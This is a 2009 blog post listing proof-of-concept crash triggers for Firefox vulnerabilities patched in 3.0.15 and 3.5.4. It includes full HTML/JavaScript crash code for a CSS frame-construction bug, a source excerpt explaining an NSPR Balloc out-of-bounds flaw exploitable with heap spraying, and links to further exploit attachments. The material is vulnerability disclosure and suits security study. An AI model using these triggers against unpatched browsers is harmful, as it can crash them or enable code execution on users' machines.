Pages

Wednesday, November 4, 2009

Mozilla Firefox: Proof-of-Concept (PoC) codes

October 27, Mozilla developers fixed several vulnerabilities in the browser engine used in Firefox and other Mozilla-based products. Vulnerabilities fixed in 3.0.15 and 3.5.4 versions.

CVE reference:
CVE-2009-1563, CVE-2009-3370, CVE-2009-3371, CVE-2009-3372, CVE-2009-3373, CVE-2009-3374, CVE-2009-3375, CVE-2009-3376, CVE-2009-3377, CVE-2009-3378, CVE-2009-3379, CVE-2009-3380, CVE-2009-3381, CVE-2009-3382, CVE-2009-3383

Complete list of Proof-of-Concept codes (crash triggers)

1. (CVE-2009-3382) CSS Frame Constructor (layout/base/nsCSSFrameConstructor.cpp) in the browser engine does not properly handle first-letter frames

PoC:
<html><head><script>
function doe2(i) {
document.getElementById('a').setAttribute('style', 'display: -moz-box; ');
document.getElementById('c').style.display= 'none';
}
setTimeout(doe2,500,0);
</script>
<style>
div::first-letter {float: right; }
</style>
</head>

<body>
<div style="width: 50px; -moz-column-count: 2;">
a
<span style="display: table-cell;"></span><div style="display: -moz-box; font-size: 43px;">
<span id="a">
<span style="display: -moz-box;">
<span id="c">m</span>
</span>
</span>
</div>

</div>
</body>
</html>

2. (CVE-2009-1563) Array indexing error in NSPR's Balloc() leads to floating point memory vulnerability

Secunia Research Details:
The s2b() function takes the total number of digits and determines the first number K for which : 1 <<>= (numdigits + 8)/9.

K is then passed to Balloc() to allocate memory. Balloc() dereferences the static "freelist" buffer of 16 elements using K as an index. If K is above 15, malformed pointers following the freelist array will be returned from Balloc().
  1. #define Kmax 15
  2. ...
  3. static Bigint *freelist[Kmax+1];
  4. ...
  5. Balloc ..(k)..
  6. ...
  7. if (rv = freelist[k]) { <-- out of bounds
  8. freelist[k] = rv->next;
  9. }
  10. ...
  11. return rv;
For e.g. K = 17, a pointer to a limited heap buffer is returned from Balloc(), and used to hold the converted big number. This results in a heap-based buffer overflow, followed by a call to a function grabbed from a corrupted pointer to a virtual function table. This results in the execution of an arbitrary address when paired with heap spraying.

PoC #1:
https://bugzilla.mozilla.org/attachment.cgi?id=400490
PoC #2 (Secunia):
https://bugzilla.mozilla.org/attachment.cgi?id=400493
PoC #3:
https://bugzilla.mozilla.org/attachment.cgi?id=406726


3. (CVE-2009-3375) Cross-origin data theft through document.getSelection()

PoC:
Select destination for iframe and select 'go'. Make a text selection and the
content should be displayed in an alert box.
https://bug503226.bugzilla.mozilla.org/attachment.cgi?id=387576

4. (CVE-2009-3378) Crash while loading .ogg video

The oggplay_data_handle_theora_frame function (media/liboggplay/src/liboggplay/oggplay_data.c) in liboggplay attempts to reuse an earlier frame data structure upon encountering a decoding error for the first frame, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or possibly execute arbitrary code via a crafted .ogg video file.

PoC:
https://bugzilla.mozilla.org/show_bug.cgi?id=500311
Crash PoC (Video)

5. (CVE-2009-3371) Crash with recursive web-worker calls

Use-after-free vulnerability allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code by creating JavaScript web-workers recursively.

PoC:
https://bugzilla.mozilla.org/attachment.cgi?id=398496

2 comments: